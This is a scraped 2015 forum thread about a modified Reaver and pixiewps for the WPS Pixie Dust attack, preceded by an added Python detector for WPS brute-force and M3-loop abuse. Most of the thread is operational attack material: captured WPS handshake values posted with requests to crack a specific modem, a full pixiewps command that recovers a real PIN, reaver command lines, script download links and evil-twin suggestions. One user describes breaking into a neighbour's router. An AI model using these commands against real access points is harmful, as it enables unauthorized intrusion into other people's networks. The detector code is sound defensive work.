----Scripting purposes, for those who want to use a possibly lockout-preventing way of PixieHash gathering for their use case.
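
An AP-side (WPS enrollee) view of what the -P loop mode above does, as an added example that is not part of the thread or of reaver: a detector that counts, per external-registrar (client) MAC, both the PIN attempts the AP NACKed after M4 and the sessions the client abandoned after M3, so that a lockout policy keyed only on failed PINs is shown to miss the loop. The event format, MAC addresses, thresholds and the sample sessions are constructed assumptions.

```python
from collections import defaultdict, deque

# Constructed sample data (not captured traffic): the AP's (WPS enrollee's) view
# of WSC messages exchanged with one client, one tuple per event:
# (seconds since start, client MAC, message). MAC addresses are placeholders.
def build_sessions(mac, count, stop_after_m3):
    """Build `count` back-to-back WPS sessions for one client, one event per second.

    A full attempt runs M1..M4 and ends with the AP's NACK (wrong first PIN half),
    the sequence reaver prints for every PIN it tries; a pixie-loop style session
    stops after M3, so the AP never gets to judge a PIN at all.
    """
    msgs = ["M1", "M2", "M3"] if stop_after_m3 else ["M1", "M2", "M3", "M4", "NACK"]
    events, t = [], 0
    for _ in range(count):
        for m in msgs:
            events.append((t, mac, m))
            t += 1
    return events


BRUTE_FORCE_EVENTS = build_sessions("02:00:00:00:00:aa", 12, stop_after_m3=False)
PIXIE_LOOP_EVENTS = build_sessions("02:00:00:00:00:bb", 8, stop_after_m3=True)


class WpsAbuseDetector:
    """Per-client sliding-window counters for two abuse signals.

    max_failures : NACKed PIN attempts allowed per window (None = do not count).
    max_abandoned: sessions dropped after M3 allowed per window (None = do not count).
    """

    def __init__(self, max_failures=10, max_abandoned=5, window_s=120):
        self.max_failures = max_failures
        self.max_abandoned = max_abandoned
        self.window_s = window_s
        self._failures = defaultdict(deque)   # mac -> timestamps of NACKed attempts
        self._abandoned = defaultdict(deque)  # mac -> timestamps of sessions left at M3
        self._stage = {}                      # mac -> last message of the open session
        self.locked = {}                      # mac -> (timestamp, reason)

    def _prune(self, dq, now):
        while dq and now - dq[0] > self.window_s:
            dq.popleft()

    def observe(self, ts, mac, msg):
        """Feed one event; return the lock reason the first time `mac` trips a limit."""
        prev = self._stage.get(mac)
        if msg == "M1":
            # A fresh M1 while this client's last session stopped at M3 means the
            # client left with the M1/M3 data (E-Nonce, PKE, E-Hash1/2) and never
            # submitted a PIN half, so no NACK was ever generated for it.
            if prev == "M3":
                self._abandoned[mac].append(ts)
            self._stage[mac] = "M1"
        elif msg == "NACK":
            # The AP only NACKs after M4, when the first PIN half was wrong.
            if prev == "M4":
                self._failures[mac].append(ts)
            self._stage[mac] = None
        else:
            self._stage[mac] = msg
        return self._evaluate(mac, ts)

    def _evaluate(self, mac, now):
        if mac in self.locked:
            return None
        self._prune(self._failures[mac], now)
        self._prune(self._abandoned[mac], now)
        n_fail, n_drop = len(self._failures[mac]), len(self._abandoned[mac])
        if self.max_failures is not None and n_fail >= self.max_failures:
            reason = f"{n_fail} failed PIN attempts within {self.window_s}s"
        elif self.max_abandoned is not None and n_drop >= self.max_abandoned:
            reason = f"{n_drop} sessions abandoned after M3 within {self.window_s}s"
        else:
            return None
        self.locked[mac] = (now, reason)
        return reason


def run(events, **policy):
    """Replay events in time order; return [(ts, mac, reason)] per lock decision."""
    det = WpsAbuseDetector(**policy)
    alerts = []
    for ts, mac, msg in sorted(events):
        reason = det.observe(ts, mac, msg)
        if reason:
            alerts.append((ts, mac, reason))
    return alerts


if __name__ == "__main__":
    for ts, mac, reason in run(BRUTE_FORCE_EVENTS + PIXIE_LOOP_EVENTS):
        print(f"t={ts:3d}s lock {mac}: {reason}")
    # A policy that only counts NACKs never notices the M3 loop:
    print("NACK-only policy alerts on the loop:", run(PIXIE_LOOP_EVENTS, max_abandoned=None))
```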

Saydamination
2015-04-20, 08:17
without small keys.



Manufacturer:
Model:
Model Number:
Serial Number:
E-Nonce:
PKE:
PKR:
E-Hash1:
E-Hash2:
Authkey:


Some of the first part may not be available, but if they are it would be helpful. And I can find the rest in the cap.

Hello soxrox2212,



Manufacturer: AirTies Wireless Networks
Model:AirTies Air5650
Model Number: 1.0.2.0
Serial Number: AT1731430001111
E-Nonce: c4:2a:3f:a5:73:1e:12:3f:24:4e:5c:86:8c:cb:07:34
PKE:7e:9d:01:01:82:4b:31:74:e8:31:8b:9a:fb:70:01:9 e:a1:0d:a4:bf:e8:27:ab:9d:56:ab:cf:47:53:06:50:5e: ed:d0:22:bb:ff:93:17:9e:59:9f:b5:83:d3:5e:ab:81:8e :78:f2:65:4e:a5:ee:5c:e0:83:86:d2:33:92:79:56:d0:6 6:41:5b:b0:83:9f:5c:fc:c6:bf:be:ab:19:5f:80:f7:fb: 73:cf:43:ba:94:88:af:2c:bb:eb:d6:4c:85:16:1a:ff:15 :aa:4b:bf:e7:67:11:1f:d5:bb:1f:31:c4:54:31:be:02:1 b:f5:2f:56:29:53:92:ad:8a:31:ca:97:ff:e8:2b:6d:42: d4:1f:af:5e:b4:d2:b1:00:8e:7c:f8:69:1b:a5:7b:81:2d :e3:0a:53:d9:29:5f:7e:cd:d2:3f:cb:fc:94:23:be:62:f a:90:f6:c2:3b:0f:36:2b:e7:dc:3d:77:07:21:fd:c9:e6: 6d:e3:d9:60:3a:89:70:c3:2c:81

PKR:63:03:64:dc:34:f0:7c:41:b2:4e:d6:86:fc:0c:cb:b 8:91:86:c9:ab:69:d6:70:36:91:6f:b8:2b:38:05:85:e2: 73:82:ac:55:ae:eb:81:dc:3a:ea:8a:10:5d:36:a0:ea:05 :35:f1:22:e3:02:64:d5:95:be:2c:e1:bd:83:cf:15:fc:b f:60:34:ca:9d:bf:82:45:f0:aa:63:37:13:37:27:e1:b0: 6f:fd:6c:42:8d:4b:65:d2:72:b1:af:22:68:c0:d6:12:78 :f0:7f:1d:f8:15:60:b7:e1:40:10:58:87:52:b3:17:70:9 4:1d:94:3a:b5:8a:56:ac:a3:96:d7:a1:3a:ec:f0:43:cb: bf:b8:2f:21:9a:e2:28:93:1f:30:b7:21:a0:c8:6c:28:f4 :16:ed:10:69:ff:60:da:34:43:1c:0d:fe:d7:0f:19:cb:e 9:5b:83:3b:a7:33:4a:1b:04:ea:03:c2:cd:74:53:2e:b8: ff:a8:09:a3:ec:6f:e7:ae:8d:0e (without -S)

PKR:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:02 (with -S)

E-Hash1:87:94:3b:ce:10:5f:f1:95:0d:b0:f7:99:03:8f:22:32:86:fb:83:6b:43:eb:33:0d:62:cb:da:01:47:a7:9e:cf

E-Hash2: bf:68:14:f6:fb:37:67:4d:ad:13:67:7b:8e:dc:5d:38:b2:82:bb:32:c3:c3:4a:ca:e4:3d:96:7b:49:e9:5c:80

Authkey:20:70:0c:e6:ea:9d:8c:70:7d:cf:e4:56:cc:72:2b:90:64:1e:17:28:72:de:08:bd:13:fb:99:0f:39:62:fa:86


Pixie is invulnerable for this modem. I wanna ask whether maybe there is a combination,

Example;

EHASH1=EHASH2=Serial number?...

Can you try to find this modem's pin?

Thanks

someone_else
2015-04-20, 09:08
Hello,

a suggestion for wash:
can you add some kind of OUI support (like the -M switch in aircrack)?

Thanks.

soxrok2212
2015-04-20, 12:48
In my area, the centurylink with a ZyXEL C1000Z is common... what kind of cap is needed? A full handshake, right? And then a separate txt with an unrelated set of pke/r ehash1/2 auth and nonce for that ap?

For you to crack, all you need is t6_x's version of Reaver and pixiewps. For us to analyze, we need a cap of the wps exchange and the output of reaver.

soxrok2212
2015-04-20, 13:05
Hello soxrox2212,



Manufacturer: AirTies Wireless Networks
Model:AirTies Air5650
Model Number: 1.0.2.0
Serial Number: AT1731430006993
E-Nonce: c4:2a:3f:a5:73:1e:12:3f:24:4e:5c:86:8c:cb:07:34
PKE:7e:9d:01:01:82:4b:31:74:e8:31:8b:9a:fb:70:01:9 e:a1:0d:a4:bf:e8:27:ab:9d:56:ab:cf:47:53:06:50:5e: ed:d0:22:bb:ff:93:17:9e:59:9f:b5:83:d3:5e:ab:81:8e :78:f2:65:4e:a5:ee:5c:e0:83:86:d2:33:92:79:56:d0:6 6:41:5b:b0:83:9f:5c:fc:c6:bf:be:ab:19:5f:80:f7:fb: 73:cf:43:ba:94:88:af:2c:bb:eb:d6:4c:85:16:1a:ff:15 :aa:4b:bf:e7:67:11:1f:d5:bb:1f:31:c4:54:31:be:02:1 b:f5:2f:56:29:53:92:ad:8a:31:ca:97:ff:e8:2b:6d:42: d4:1f:af:5e:b4:d2:b1:00:8e:7c:f8:69:1b:a5:7b:81:2d :e3:0a:53:d9:29:5f:7e:cd:d2:3f:cb:fc:94:23:be:62:f a:90:f6:c2:3b:0f:36:2b:e7:dc:3d:77:07:21:fd:c9:e6: 6d:e3:d9:60:3a:89:70:c3:2c:81

PKR:63:03:64:dc:34:f0:7c:41:b2:4e:d6:86:fc:0c:cb:b 8:91:86:c9:ab:69:d6:70:36:91:6f:b8:2b:38:05:85:e2: 73:82:ac:55:ae:eb:81:dc:3a:ea:8a:10:5d:36:a0:ea:05 :35:f1:22:e3:02:64:d5:95:be:2c:e1:bd:83:cf:15:fc:b f:60:34:ca:9d:bf:82:45:f0:aa:63:37:13:37:27:e1:b0: 6f:fd:6c:42:8d:4b:65:d2:72:b1:af:22:68:c0:d6:12:78 :f0:7f:1d:f8:15:60:b7:e1:40:10:58:87:52:b3:17:70:9 4:1d:94:3a:b5:8a:56:ac:a3:96:d7:a1:3a:ec:f0:43:cb: bf:b8:2f:21:9a:e2:28:93:1f:30:b7:21:a0:c8:6c:28:f4 :16:ed:10:69:ff:60:da:34:43:1c:0d:fe:d7:0f:19:cb:e 9:5b:83:3b:a7:33:4a:1b:04:ea:03:c2:cd:74:53:2e:b8: ff:a8:09:a3:ec:6f:e7:ae:8d:0e (without -S)

PKR:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:02 (with -S)

E-Hash1:87:94:3b:ce:10:5f:f1:95:0d:b0:f7:99:03:8f:22:32:86:fb:83:6b:43:eb:33:0d:62:cb:da:01:47:a7:9e:cf

E-Hash2: bf:68:14:f6:fb:37:67:4d:ad:13:67:7b:8e:dc:5d:38:b2:82:bb:32:c3:c3:4a:ca:e4:3d:96:7b:49:e9:5c:80

Authkey:20:70:0c:e6:ea:9d:8c:70:7d:cf:e4:56:cc:72:2b:90:64:1e:17:28:72:de:08:bd:13:fb:99:0f:39:62:fa:86


Pixie is invulnerable for this modem. I wanna ask whether maybe there is a combination,

Example;

EHASH1=EHASH2=Serial number?...

Can you try to find this modem's pin?

Thanks

While this is certainly possible, I highly doubt that E-S1 = E-S2 = Serial number for a few reasons:

1- Serial numbers are assigned by the router manufacturer, not by the chip manufacturer and usually the router manufacturers do NOT modify the WPS implementation on their devices. Therefore, E-S1 = whatever the chip manufacturer implemented and the same goes for E-S2.

2- Serial numbers can vary in length and conversion to HEX would give us a different length of data than we need.

kcdtv
2015-04-20, 13:18
1- Serial numbers are assigned by the router manufacturer, not by the chip manufacturer and usually the router manufacturers do NOT modify the WPS implementation on their devices. Therefore, E-S1 = whatever the chip manufacturer implemented and the same goes for E-S2.

very good point.

slmafiq
2015-04-20, 15:26
Some of it may be useful
http://rpc.one.pl/pliki/openwrt/backfire/10.03.x/atheros/hostapd/dokumentacja/README-WPS

Focus on TP-LINK TL-WR740N :(
is it possible to invent something ?

t6_x
2015-04-20, 20:40
Some of it may be useful
http://rpc.one.pl/pliki/openwrt/backfire/10.03.x/atheros/hostapd/dokumentacja/README-WPS

Focus on TP-LINK TL-WR740N :(
is it possible to invent something ?

Theoretically yes.

But not in practice: the sampling space to bruteforce ends up being very large, bordering on "infinity", so the time for the bruteforce ends up being a few decades.

There are some TP-Link models with old firmware where the key generation is based on the router's time; those, yes, can be attacked, but I believe nowadays they are very rare. So far I have not found any, only the one I have here at home, which is from 2005-2007, I don't remember.

Firmware analysis takes too long and is an absurdly boring job; it may be that over time some news appears.

slmafiq
2015-04-21, 15:22
Thank you for your attention!
Is it more convenient to create an "Evil Twin attack"?
Are you familiar with this?

SeaF0ur
2015-04-22, 16:55
For you to crack, all you need is t6_x's version of Reaver. For us to analyze, we need a cap of the wps exchange and the output of reaver.

Cracking's no issue... Would it be best to start with an evil twin to get the handshake cap? Or would a wireshark cap with mdk3 running be sufficient?

popthattif
2015-04-22, 19:47
How can i make reaver send M2 without sending M1?

Saydamination
2015-04-25, 18:57
Hi T6_x,

Which MAC address is the original MAC on the modem? wlan0-1? wlan0 = F8:1A:67.... wlan0-1 = FA:1A:67....??

Probably, you can update something with this information...




br-admin Link encap:Ethernet HWaddr F8:1A:67:40:02:33
inet addr:10.10.10.254 Bcast:10.10.10.255 Mask:255.255.255.0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

br-lan Link encap:Ethernet HWaddr F8:1A:67:40:02:31
inet addr:172.25.10.230 Bcast:172.25.255.255 Mask:255.255.0.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1044 errors:0 dropped:26 overruns:0 frame:0
TX packets:95 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:59454 (58.0 KiB) TX bytes:12990 (12.6 KiB)

br-public Link encap:Ethernet HWaddr F8:1A:67:40:02:31
inet addr:10.10.20.230 Bcast:10.10.20.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1 errors:0 dropped:0 overruns:0 frame:0
TX packets:5 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:46 (46.0 B) TX bytes:402 (402.0 B)

eth0 Link encap:Ethernet HWaddr F8:1A:67:40:02:31
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:316366 errors:0 dropped:3 overruns:0 frame:0
TX packets:54223 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:69817474 (66.5 MiB) TX bytes:8268306 (7.8 MiB)
Interrupt:5

eth0.1 Link encap:Ethernet HWaddr F8:1A:67:40:02:31
inet addr:169.10.10.254 Bcast:255.255.255.255 Mask:255.255.255.255
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

eth0.2 Link encap:Ethernet HWaddr F8:1A:67:40:02:31
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1169 errors:0 dropped:1 overruns:0 frame:0
TX packets:96 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:95730 (93.4 KiB) TX bytes:13036 (12.7 KiB)

eth0.3 Link encap:Ethernet HWaddr F8:1A:67:40:02:31
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1 errors:0 dropped:0 overruns:0 frame:0
TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:46 (46.0 B) TX bytes:448 (448.0 B)

eth1 Link encap:Ethernet HWaddr F8:1A:67:40:02:33
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:4

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:174 errors:0 dropped:0 overruns:0 frame:0
TX packets:174 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:12833 (12.5 KiB) TX bytes:12833 (12.5 KiB)

wlan0 Link encap:Ethernet HWaddr F8:1A:67:40:02:32
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:376 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:32
RX bytes:0 (0.0 B) TX bytes:31239 (30.5 KiB)

wlan0-1 Link encap:Ethernet HWaddr FA:1A:67:40:02:33
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:348 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:32
RX bytes:0 (0.0 B) TX bytes:28963 (28.2 KiB)

wlan0-2 Link encap:Ethernet HWaddr FA:1A:67:40:02:34
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:1 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:32
RX bytes:0 (0.0 B) TX bytes:64 (64.0 B)

t6_x
2015-04-26, 22:00
This happens sometimes, but it is difficult to create a solution, since each firmware works in a different way.

Since it is not something generic, it is difficult to create a solution.

nuroo
2015-04-27, 21:26
Any use for the -D, --daemonize option of Reaver?

Benefits, specials cases?

nuroo
2015-04-29, 00:29
Getting the -m error when reaver tries to use pixiewps. That error has been explained as a new feature pre-release for the new version 1.1.

I can work around that issue and just hand cut and paste hashes like the old days.

But now reaver 1.5.2 downloaded from git today won't associate with even the neighborhood ***** router.
Used aireplay-ng to associate with the router and she dropped her drawers. And let me right in there.
Then I used the -A option with reaver and it connected and got hashes but then -m.

Am I the only one?

mmusket33
2015-04-29, 02:25
Musket Teams have voted to release their Pixie Dust Data Sequence Analyzer PDDSA-01.sh for general use. This script was originally written to work with VMR-MDK009x2.sh a WPS locked intrusion script. But it can work with any text file output from modded reaver programs showing both PKE and PKR.

PDDSA-01.sh simply reads any data output in text format from a modded reaver program, looks for valid Pixie Dust Sequences and extracts the pin using pixiewps. No cut and paste. You can check all the sequences in the file or just one. After the first valid sequence is found the program can cycle thru all the other sequences as required.

If you are not using VMR-MDK009x2 then simply use the command line:

reaver -i mon0 -a -f -c 1 -b 55:44:33:22:11:00 -vv | tee /root/VARMAC_LOGS/targetAP

The reaver command line side can be altered as required however the -vv must remain or no data will be written.

There is a help file in the download.

You can download at two (2) locations

PDDSA-01.sh has been updated to support routers giving altered text output,

You can download PDDSA-02.sh at:

http://www.datafilehost.com/d/e6a13191

or thru aircrack-ng forums see thread

http://forum.aircrack-ng.org/index.php/topic,868.15.html

See thread 21

MTeams

aanarchyy
2015-04-29, 03:42
lol @ mmusket33 it's soxrok2212 not soxrox2212 or soxorx2212 (Red Sox reference maybe? ;-)), not to be pedantic...

mmusket33
2015-04-29, 05:58
Thanks aanarchyy, we will correct that. If you find any bugs in the coding, we will reissue.

MTEAMS

nuroo
2015-04-30, 14:46
@t6_x

still hoping for a timer function for -g option

-g <sec> # set timeout for chipset recovery...... next update

popthattif
2015-05-02, 00:05
Technicolor TD5130

pixiewps -e d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b -s f4:7b:17:b3:dc:de:29:b2:87:fa:39:ab:66:ce:21:a4:91 :79:93:fc:d1:c5:48:ee:c0:c0:bb:27:4f:fd:ac:95 -z b7:a4:00:05:b2:31:b0:d7:53:96:a7:ce:2c:e0:50:8c:53 :24:e8:66:75:24:7d:32:31:5c:36:ca:54:75:37:50 -r 4f:f3:c0:b0:63:76:0e:1b:8c:22:b4:8f:00:26:0b:fc:ce :84:f5:91:df:46:5a:d0:d7:e6:ec:65:a6:03:56:bb:c1:a 8:10:db:34:7a:c3:29:c5:25:c3:9d:db:93:79:a2:1f:42: 38:64:cf:93:1b:19:49:85:6c:48:2a:6a:88:c1:25:09:58 :6e:2d:de:c1:a4:f2:5c:78:35:9e:8f:13:cc:81:9f:7f:0 d:0d:7c:43:52:72:f2:b5:08:84:ed:e2:bc:5b:26:32:e7: bb:69:ec:40:2e:42:fc:ff:d8:aa:4c:c8:be:f2:e9:ae:b3 :e8:82:6b:0e:1e:3e:fd:73:47:cb:72:b5:0e:f6:b4:ff:2 8:e4:67:8c:9d:2f:08:ee:d8:09:ab:0c:3f:02:44:73:72: 93:35:70:6b:7f:8d:3f:8e:cc:f1:9d:51:40:42:1d:66:d7 :d7:ee:61:9c:58:cc:2c:7b:0e:a4:64:b9:59:6a:76:e5:2 1:37:38:cb:b7:5c:1b:4d:36 -n 71:31:e9:e7:7b:a6:c7:f0:2d:6d:ac:d3:1e:fc:7b:1d -a a0:68:dd:b2:e5:5f:6e:55:54:37:b2:3b:71:cf:d5:a3:5b :14:15:23:49:33:77:17:79:f0:f4:cf:19:e1:09:1e -m f2:6c:ab:f5:0d:8f:a8:cf:f4:ab:9a:27:36:04:a4:3e -b 00:18:E7:******** -v 3 -f 4

Pixiewps 1.1

PRNG Seed: 1317453909 (Sat Oct 1 07:25:09 2011)
PSK1: a6:6e:0e:6f:44:2c:6d:cf:ef:21:69:c0:55:e4:72:b7
PSK2: 73:87:3a:a1:84:e1:3a:30:fe:87:0c:93:fa:4e:f0:52
E-S1: 1f:46:23:13:30:c3:a1:3d:54:74:c5:7e:48:35:8a:41
E-S2: 1f:46:23:13:30:c3:a1:3d:54:74:c5:7e:48:35:8a:41
[+] WPS pin: 65056851

Time taken: 695 s

Desuu
2015-05-02, 14:22
@popthattif please, what command in reaver did you use to get the 00:18:E7 ? Did it work on the 18:17:25 too ? I tried everything and nothing seems to work.

j.kali
2015-05-02, 21:25
Hi, thanks. I just wanted to mention that after running apt-get dist-upgrade, it no longer works.
After attempting different steps to try to fix it, the only thing that did it was to

#apt-get purge libpcap-dev aircrack-ng sqlite3 libsqlite3-dev

then
#apt-get install libpcap-dev aircrack-ng sqlite3 libsqlite3-dev

recompiling reaver and installing it again.
Dunno if it was just me. But I was using a VM with 1.12 and my notebook as well. After upgrading Kali, it no longer worked. Same problem on both. But it is finally solved.

nuroo
2015-05-04, 13:27
Heard there may be a video tutorial soon, showing how to use the new pixiewps 1.1 with reaver??

Also wondering if there are any plans to have reaver once again automatically use all necessary attacks in updated pixie??

g0tmi1k
2015-05-04, 13:42
For what it's worth, this version of reaver is now the default version in the main Kali repo.
More information:
+ http://git.kali.org/gitweb/?p=packages/reaver.git;a=summary
+ https://www.kali.org/penetration-testing/pixiewps-reaver-aircrack-ng-updates/

Quest
2015-05-04, 14:52
Congrats!

Could these guys have a dedicated R&D forum section maybe? Feels like walking on eggshells whenever discussing R&D.

t6_x
2015-05-04, 17:52
Heard there may be a video tutorial soon, showing how to use the new pixiewps 1.1 with reaver??

Also wondering if there are any plans to have reaver once again automatically use all necessary attacks in updated pixie??



We are working on it.

I'm a little overworked, but I will make the necessary updates.


I'm sorry for the delay in updates these past few weeks, I'm full of work.

nuroo
2015-05-04, 18:11
@t6x
Appreciate the hard work......for free even. We all are grateful u stepped up and updated reaver with pixie.

t6_x
2015-05-04, 18:25
@t6x
Appreciate the hard work......for free even. We all are grateful u stepped up and updated reaver with pixie.

if some tests I'm doing work, we will have some news in a few weeks

:)

nuroo
2015-05-04, 18:43
If u need hash collection or beta test, I'm available

soxrok2212
2015-05-04, 18:45
If u need hash collection or beta test, I'm available

With my limited time today, I'll try to look at that Greenwave data you sent me :D

AND can you get me a beacon frame from it?

aanarchyy
2015-05-04, 19:08
With my limited time today, I'll try to look at that Greenwave data you sent me :D

AND can you get me a beacon frame from it?

should be a beacon frame in the greenwave cap file i posted
http://d-h.st/9dE1

soxrok2212
2015-05-04, 19:23
should be a beacon frame in the greenwave cap file i posted
http://d-h.st/9dE1

Ah, I think I passed right over that, thanks. I'm moving over to the original pixie dust thread because this doesn't really pertain to Reaver...

t6_x
2015-05-05, 00:55
There is already a new update on GitHub.

It was already using the new pixiewps; Wiire had updated reaver to work with it, and now I made some adjustments to make it a little more automated.

I improved the code too.

t6_x
2015-05-16, 11:42
There is already a new update on GitHub.

Bug fixes

Vinit2512
2015-06-01, 07:58
Hey,
I tried to test forked reaver & Pixiewps on the supposedly invulnerable "D-Link RTL 8671 EV 2006 27 07 (Realtek)".

1. used reaver -i mon0 - bssid -v -K 1 (didn't use -S, as it's a Realtek chip)
got all the arguments for pixiewps
Result found as...
a. No WPS pin found
b. WPS Pin= 12345670 (when the -f argument was used with pixiewps)


2. Now tried to use WPS Generator

3 pins came out. When I tried to use them to find the passphrase, Reaver never proceeds further.

Which pin is correct? When I use --pin in reaver, Reaver just gets stuck in a loop and then gets locked out after 10 tries.

t6_x
2015-06-02, 22:01
https://forums.kali.org/showthread.php?25123-Reaver-modfication-for-Pixie-Dust-Attack/page5

Read the page 5 for pin generator

Vinit2512
2015-06-03, 07:08
Thanks for the reply :) Got the logic. Apparently None of the 3 Pins was correct. All tries led to LockOut. PixieWPS also not working on RTL8671. Normal Reaver attack stops @11th pin, and after that "25 Successive Start Failures". Is RTL8671 Un-hackable? ***i am going to lose the bet** :(

soxrok2212
2015-06-03, 15:07
Thanks for the reply :) Got the logic. Apparently None of the 3 Pins was correct. All tries led to LockOut. PixieWPS also not working on RTL8671. Normal Reaver attack stops @11th pin, and after that "25 Successive Start Failures". Is RTL8671 Un-hackable? ***i am going to lose the bet** :(

The RTL8671 is certainly different. It is a SoC (System on Chip) which means pretty much everything is done on that chip... different than your average AP. SoC are generally found in DSL+Cable+Fiber/Router combo devices which leads me to think that they use a different PRNG.

The good news: When I first noticed the static E-Nonce on Realtek devices it kinda told me that their implementation was insecure. Again, seeing a strange nonce following the XX:XX:00:00 pattern, it leads me to think their implementation here is broken also. Wiire and I are looking at it and if we can't find anything, I'll talk with Dominique Bongard. All great people to work with and I love having the pleasure of being able to :)

--I will move to the Pixie Dust thread since this does not pertain to Reaver

Azul
2015-06-14, 03:24
Hi guys,

First, thank you very much for coming up and posting this great idea.

I'm having a difficulty with Reaver. Basically, it won't return the E-Nonce, PKE, manufacturer, model number, etc. The output is exactly like "regular" Reaver.
I was looking for posts with the same problem, but haven't found... which is also weird... What am I doing wrong? I installed Reaver and Pixie exactly like the instructions, and even re-installed just to be sure.

This is the output I get:



> reaver -i wlan1mon -c 6 -b 04:**:**:**:**:** -vv -S

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire & kib0rg

[+] Switching wlan1mon to channel 6
[+] Waiting for beacon from 04:**:**:**:**:**
[+] Associated with 04:**:**:**:**:** (ESSID: *****)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 1
[+] Pin count advanced: 1. Max pin attempts: 11000
[+] Trying pin 00005678.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 2
[+] Pin count advanced: 2. Max pin attempts: 11000
^C
[+] Session saved.



Any ideas?

Thanks!

soxrok2212
2015-06-14, 14:03
Hi guys,

First, thank you very much for coming up and posting this great idea.

I'm having a difficulty with Reaver. Basically, it won't return the E-Nonce, PKE, manufacturer, model number, etc. The output is exactly like "regular" Reaver.
